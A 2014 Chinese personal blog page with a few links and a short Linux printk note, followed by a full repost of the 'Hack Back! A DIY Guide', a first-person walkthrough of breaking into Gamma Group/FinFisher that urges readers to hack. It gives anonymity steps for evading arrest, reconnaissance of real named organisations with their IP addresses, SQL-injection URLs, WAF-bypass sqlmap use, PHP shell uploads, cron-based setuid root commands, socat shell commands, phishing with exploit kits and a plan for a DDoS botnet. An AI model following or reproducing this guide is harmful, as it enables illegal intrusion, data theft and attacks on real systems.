FireSSH Version History
https://addons.mozilla.org/en-US/firefox/addon/firessh/versions/
SCRAPfy
http://scrapfy.io/
https://addons.mozilla.org/zh-tw/firefox/addon/scrapfy/?src=search
SSCloud
https://sscloud.unicloud.org.tw/project/
SSBox
https://ssbox.unicloud.org.tw/home/
2014年10月22日 星期三
2014年10月15日 星期三
printk 怪異行為
printk(KERN_EMERG "in init 0");
printk(KERN_ALERT "in init 1");
printk(KERN_CRIT "in init 2");
printk(KERN_ERR "in init 3");
printk(KERN_WARNING "in init 4");
printk(KERN_NOTICE "in init 5");
printk(KERN_INFO "in init 6");
printk(KERN_DEBUG "in init 7");
$ more /proc/kmsg
<0>[59669.102081] in init 0
<1>[59669.102162] in init 1in init 2
<3>[59669.104082] in init 3in init 4
<5>[59669.104082] in init 5in init 6
printk(KERN_ALERT "in init 1");
printk(KERN_CRIT "in init 2");
printk(KERN_ERR "in init 3");
printk(KERN_WARNING "in init 4");
printk(KERN_NOTICE "in init 5");
printk(KERN_INFO "in init 6");
printk(KERN_DEBUG "in init 7");
$ more /proc/kmsg
<0>[59669.102081] in init 0
<1>[59669.102162] in init 1in init 2
<3>[59669.104082] in init 3in init 4
<5>[59669.104082] in init 5in init 6
2014年8月16日 星期六
2014年8月14日 星期四
- _ _ _ ____ _ _
- | | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
- | |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
- | _ | (_| | (__| < | |_) | (_| | (__| <|_|
- |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
- A DIY Guide for those without the patience to wait for whistleblowers
- --[ 1 ]-- Introduction
- I'm not writing this to brag about what an 31337 h4x0r I am and what m4d sk1llz
- it took to 0wn Gamma. I'm writing this to demystify hacking, to show how simple
- it is, and to hopefully inform and inspire you to go out and hack shit. If you
- have no experience with programming or hacking, some of the text below might
- look like a foreign language. Check the resources section at the end to help you
- get started. And trust me, once you've learned the basics you'll realize this
- really is easier than filing a FOIA request.
- --[ 2 ]-- Staying Safe
- This is illegal, so you'll need to take same basic precautions:
- 1) Make a hidden encrypted volume with Truecrypt 7.1a [0]
- 2) Inside the encrypted volume install Whonix [1]
- 3) (Optional) While just having everything go over Tor thanks to Whonix is
- probably sufficient, it's better to not use an internet connection connected
- to your name or address. A cantenna, aircrack, and reaver can come in handy
- here.
- [0] https://truecrypt.ch/downloads/
- [1] https://www.whonix.org/wiki/Download#Install_Whonix
- As long as you follow common sense like never do anything hacking related
- outside of Whonix, never do any of your normal computer usage inside Whonix,
- never mention any information about your real life when talking with other
- hackers, and never brag about your illegal hacking exploits to friends in real
- life, then you can pretty much do whatever you want with no fear of being v&.
- NOTE: I do NOT recommend actually hacking directly over Tor. While Tor is usable
- for some things like web browsing, when it comes to using hacking tools like
- nmap, sqlmap, and nikto that are making thousands of requests, they will run
- very slowly over Tor. Not to mention that you'll want a public IP address to
- receive connect back shells. I recommend using servers you've hacked or a VPS
- paid with bitcoin to hack from. That way only the low bandwidth text interface
- between you and the server is over Tor. All the commands you're running will
- have a nice fast connection to your target.
- --[ 3 ]-- Mapping out the target
- Basically I just repeatedly use fierce [0], whois lookups on IP addresses and
- domain names, and reverse whois lookups to find all IP address space and domain
- names associated with an organization.
- [0] http://ha.ckers.org/fierce/
- For an example let's take Blackwater. We start out knowing their homepage is at
- academi.com. Running fierce.pl -dns academi.com we find the subdomains:
- 67.238.84.228 email.academi.com
- 67.238.84.242 extranet.academi.com
- 67.238.84.240 mail.academi.com
- 67.238.84.230 secure.academi.com
- 67.238.84.227 vault.academi.com
- 54.243.51.249 www.academi.com
- Now we do whois lookups and find the homepage of www.academi.com is hosted on
- Amazon Web Service, while the other IPs are in the range:
- NetRange: 67.238.84.224 - 67.238.84.255
- CIDR: 67.238.84.224/27
- CustName: Blackwater USA
- Address: 850 Puddin Ridge Rd
- Doing a whois lookup on academi.com reveals it's also registered to the same
- address, so we'll use that as a string to search with for the reverse whois
- lookups. As far as I know all the actual reverse whois lookup services cost
- money, so I just cheat with google:
- "850 Puddin Ridge Rd" inurl:ip-address-lookup
- "850 Puddin Ridge Rd" inurl:domaintools
- Now run fierce.pl -range on the IP ranges you find to lookup dns names, and
- fierce.pl -dns on the domain names to find subdomains and IP addresses. Do more
- whois lookups and repeat the process until you've found everything.
- Also just google the organization and browse around its websites. For example on
- academi.com we find links to a careers portal, an online store, and an employee
- resources page, so now we have some more:
- 54.236.143.203 careers.academi.com
- 67.132.195.12 academiproshop.com
- 67.238.84.236 te.academi.com
- 67.238.84.238 property.academi.com
- 67.238.84.241 teams.academi.com
- If you repeat the whois lookups and such you'll find academiproshop.com seems to
- not be hosted or maintained by Blackwater, so scratch that off the list of
- interesting IPs/domains.
- In the case of FinFisher what led me to the vulnerable finsupport.finfisher.com
- was simply a whois lookup of finfisher.com which found it registered to the name
- "FinFisher GmbH". Googling for:
- "FinFisher GmbH" inurl:domaintools
- finds gamma-international.de, which redirects to finsupport.finfisher.com
- ...so now you've got some idea how I map out a target.
- This is actually one of the most important parts, as the larger the attack
- surface that you are able to map out, the easier it will be to find a hole
- somewhere in it.
- --[ 4 ]-- Scanning & Exploiting
- Scan all the IP ranges you found with nmap to find all services running. Aside
- from a standard port scan, scanning for SNMP is underrated.
- Now for each service you find running:
- 1) Is it exposing something it shouldn't? Sometimes companies will have services
- running that require no authentication and just assume it's safe because the url
- or IP to access it isn't public. Maybe fierce found a git subdomain and you can
- go to git.companyname.come/gitweb/ and browse their source code.
- 2) Is it horribly misconfigured? Maybe they have an ftp server that allows
- anonymous read or write access to an important directory. Maybe they have a
- database server with a blank admin password (lol stratfor). Maybe their embedded
- devices (VOIP boxes, IP Cameras, routers etc) are using the manufacturer's
- default password.
- 3) Is it running an old version of software vulnerable to a public exploit?
- Webservers deserve their own category. For any webservers, including ones nmap
- will often find running on nonstandard ports, I usually:
- 1) Browse them. Especially on subdomains that fierce finds which aren't intended
- for public viewing like test.company.com or dev.company.com you'll often find
- interesting stuff just by looking at them.
- 2) Run nikto [0]. This will check for things like webserver/.svn/,
- webserver/backup/, webserver/phpinfo.php, and a few thousand other common
- mistakes and misconfigurations.
- 3) Identify what software is being used on the website. WhatWeb is useful [1]
- 4) Depending on what software the website is running, use more specific tools
- like wpscan [2], CMS-Explorer [3], and Joomscan [4].
- First try that against all services to see if any have a misconfiguration,
- publicly known vulnerability, or other easy way in. If not, it's time to move
- on to finding a new vulnerability:
- 5) Custom coded web apps are more fertile ground for bugs than large widely used
- projects, so try those first. I use ZAP [5], and some combination of its
- automated tests along with manually poking around with the help of its
- intercepting proxy.
- 6) For the non-custom software they're running, get a copy to look at. If it's
- free software you can just download it. If it's proprietary you can usually
- pirate it. If it's proprietary and obscure enough that you can't pirate it you
- can buy it (lame) or find other sites running the same software using google,
- find one that's easier to hack, and get a copy from them.
- [0] http://www.cirt.net/nikto2
- [1] http://www.morningstarsecurity.com/research/whatweb
- [2] http://wpscan.org/
- [3] https://code.google.com/p/cms-explorer/
- [4] http://sourceforge.net/projects/joomscan/
- [5] https://code.google.com/p/zaproxy/
- For finsupport.finfisher.com the process was:
- * Start nikto running in the background.
- * Visit the website. See nothing but a login page. Quickly check for sqli in the
- login form.
- * See if WhatWeb knows anything about what software the site is running.
- * WhatWeb doesn't recognize it, so the next question I want answered is if this
- is a custom website by Gamma, or if there are other websites using the same
- software.
- * I view the page source to find a URL I can search on (index.php isn't
- exactly unique to this software). I pick Scripts/scripts.js.php, and google:
- allinurl:"Scripts/scripts.js.php"
- * I find there's a handful of other sites using the same software, all coded by
- the same small webdesign firm. It looks like each site is custom coded but
- they share a lot of code. So I hack a couple of them to get a collection of
- code written by the webdesign firm.
- At this point I can see the news stories that journalists will write to drum
- up views: "In a sophisticated, multi-step attack, hackers first compromised a
- web design firm in order to acquire confidential data that would aid them in
- attacking Gamma Group..."
- But it's really quite easy, done almost on autopilot once you get the hang of
- it. It took all of a couple minutes to:
- * google allinurl:"Scripts/scripts.js.php" and find the other sites
- * Notice they're all sql injectable in the first url parameter I try.
- * Realize they're running Apache ModSecurity so I need to use sqlmap [0] with
- the option --tamper='tamper/modsecurityversioned.py'
- * Acquire the admin login information, login and upload a php shell [1] (the
- check for allowable file extensions was done client side in javascript), and
- download the website's source code.
- [0] http://sqlmap.org/
- [1] https://epinna.github.io/Weevely/
- Looking through the source code they might as well have named it Damn Vulnerable
- Web App v2 [0]. It's got sqli, LFI, file upload checks done client side in
- javascript, and if you're unauthenticated the admin page just sends you back to
- the login page with a Location header, but you can have your intercepting proxy
- filter the Location header out and access it just fine.
- [0] http://www.dvwa.co.uk/
- Heading back over to the finsupport site, the admin /BackOffice/ page returns
- 403 Forbidden, and I'm having some issues with the LFI, so I switch to using the
- sqli (it's nice to have a dozen options to choose from). The other sites by the
- web designer all had an injectable print.php, so some quick requests to:
- https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1
- https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
- reveal that finsupport also has print.php and it is injectable. And it's
- database admin! For MySQL this means you can read and write files. It turns out
- the site has magicquotes enabled, so I can't use INTO OUTFILE to write files.
- But I can use a short script that uses sqlmap --file-read to get the php source
- for a URL, and a normal web request to get the HTML, and then finds files
- included or required in the php source, and finds php files linked in the HTML,
- to recursively download the source to the whole site.
- Looking through the source, I see customers can attach a file to their support
- tickets, and there's no check on the file extension. So I pick a username and
- password out of the customer database, create a support request with a php shell
- attached, and I'm in!
- --[ 5 ]-- (fail at) Escalating
- ___________
- < got r00t? >
- -----------
- \ ^__^
- \ (oo)\_______
- (__)\ )\/\
- ||----w |
- || ||
- ^^^^^^^^^^^^^^^^
- Root over 50% of linux servers you encounter in the wild with two easy scripts,
- Linux_Exploit_Suggester [0], and unix-privesc-check [1].
- [0] https://github.com/PenturaLabs/Linux_Exploit_Suggester
- [1] https://code.google.com/p/unix-privesc-check/
- finsupport was running the latest version of Debian with no local root exploits,
- but unix-privesc-check returned:
- WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user
- www-data can write to /etc/cron.hourly/mgmtlicensestatus
- WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data
- can write to /etc/cron.hourly/webalizer
- so I add to /etc/cron.hourly/webalizer:
- chown root:root /path/to/my_setuid_shell
- chmod 04755 /path/to/my_setuid_shell
- wait an hour, and ....nothing. Turns out that while the cron process is running
- it doesn't seem to be actually running cron jobs. Looking in the webalizer
- directory shows it didn't update stats the previous month. Apparently after
- updating the timezone cron will sometimes run at the wrong time or sometimes not
- run at all and you need to restart cron after changing the timezone. ls -l
- /etc/localtime shows the timezone got updated June 6, the same time webalizer
- stopped recording stats, so that's probably the issue. At any rate, the only
- thing this server does is host the website, so I already have access to
- everything interesting on it. Root wouldn't get much of anything new, so I move
- on to the rest of the network.
- --[ 6 ]-- Pivoting
- The next step is to look around the local network of the box you hacked. This
- is pretty much the same as the first Scanning & Exploiting step, except that
- from behind the firewall many more interesting services will be exposed. A
- tarball containing a statically linked copy of nmap and all its scripts that you
- can upload and run on any box is very useful for this. The various nfs-* and
- especially smb-* scripts nmap has will be extremely useful.
- The only interesting thing I could get on finsupport's local network was another
- webserver serving up a folder called 'qateam' containing their mobile malware.
- --[ 7 ]-- Have Fun
- Once you're in their networks, the real fun starts. Just use your imagination.
- While I titled this a guide for wannabe whistleblowers, there's no reason to
- limit yourself to leaking documents. My original plan was to:
- 1) Hack Gamma and obtain a copy of the FinSpy server software
- 2) Find vulnerabilities in FinSpy server.
- 3) Scan the internet for, and hack, all FinSpy C&C servers.
- 4) Identify the groups running them.
- 5) Use the C&C server to upload and run a program on all targets telling them
- who was spying on them.
- 6) Use the C&C server to uninstall FinFisher on all targets.
- 7) Join the former C&C servers into a botnet to DDoS Gamma Group.
- It was only after failing to fully hack Gamma and ending up with some
- interesting documents but no copy of the FinSpy server software that I had to
- make due with the far less lulzy backup plan of leaking their stuff while
- mocking them on twitter.
- Point your GPUs at FinSpy-PC+Mobile-2012-07-12-Final.zip and crack the password
- already so I can move on to step 2!
- --[ 8 ]-- Other Methods
- The general method I outlined above of scan, find vulnerabilities, and exploit
- is just one way to hack, probably better suited to those with a background in
- programming. There's no one right way, and any method that works is as good as
- any other. The other main ways that I'll state without going into detail are:
- 1) Exploits in web browers, java, flash, or microsoft office, combined with
- emailing employees with a convincing message to get them to open the link or
- attachment, or hacking a web site frequented by the employees and adding the
- browser/java/flash exploit to that.
- This is the method used by most of the government hacking groups, but you don't
- need to be a government with millions to spend on 0day research or subscriptions
- to FinSploit or VUPEN to pull it off. You can get a quality russian exploit kit
- for a couple thousand, and rent access to one for much less. There's also
- metasploit browser autopwn, but you'll probably have better luck with no
- exploits and a fake flash updater prompt.
- 2) Taking advantage of the fact that people are nice, trusting, and helpful 95%
- of the time.
- The infosec industry invented a term to make this sound like some sort of
- science: "Social Engineering". This is probably the way to go if you don't know
- too much about computers, and it really is all it takes to be a successful
- hacker [0].
- [0] https://www.youtube.com/watch?v=DB6ywr9fngU
- --[ 9 ]-- Resources
- Links:
- * https://www.pentesterlab.com/exercises/
- * http://overthewire.org/wargames/
- * http://www.hackthissite.org/
- * http://smashthestack.org/
- * http://www.win.tue.nl/~aeb/linux/hh/hh.html
- * http://www.phrack.com/
- * http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot
- * http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash
- * https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/
- * https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers
- (all his other blog posts are great too)
- * https://www.corelan.be/ (start at Exploit writing tutorial part 1)
- * http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/
- One trick it leaves out is that on most systems the apache access log is
- readable only by root, but you can still include from /proc/self/fd/10 or
- whatever fd apache opened it as. It would also be more useful if it mentioned
- what versions of php the various tricks were fixed in.
- * http://www.dest-unreach.org/socat/
- Get usable reverse shells with a statically linked copy of socat to drop on
- your target and:
- target$ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp-listen:PORTNUM
- host$ socat file:`tty`,raw,echo=0 tcp-connect:localhost:PORTNUM
- It's also useful for setting up weird pivots and all kinds of other stuff.
- Books:
- * The Web Application Hacker's Handbook
- * Hacking: The Art of Exploitation
- * The Database Hacker's Handbook
- * The Art of Software Security Assessment
- * A Bug Hunter's Diary
- * Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier
- * TCP/IP Illustrated
- Aside from the hacking specific stuff almost anything useful to a system
- administrator for setting up and administering networks will also be useful for
- exploring them. This includes familiarity with the windows command prompt and unix
- shell, basic scripting skills, knowledge of ldap, kerberos, active directory,
- networking, etc.
- --[ 10 ]-- Outro
- You'll notice some of this sounds exactly like what Gamma is doing. Hacking is a
- tool. It's not selling hacking tools that makes Gamma evil. It's who their
- customers are targeting and with what purpose that makes them evil. That's not
- to say that tools are inherently neutral. Hacking is an offensive tool. In the
- same way that guerrilla warfare makes it harder to occupy a country, whenever
- it's cheaper to attack than to defend it's harder to maintain illegitimate
- authority and inequality. So I wrote this to try to make hacking easier and more
- accessible. And I wanted to show that the Gamma Group hack really was nothing
- fancy, just standard sqli, and that you do have the ability to go out and take
- similar action.
- Solidarity to everyone in Gaza, Israeli conscientious-objectors, Chelsea
- Manning, Jeremy Hammond, Peter Sunde, anakata, and all other imprisoned
- hackers, dissidents, and criminals!
訂閱:
文章 (Atom)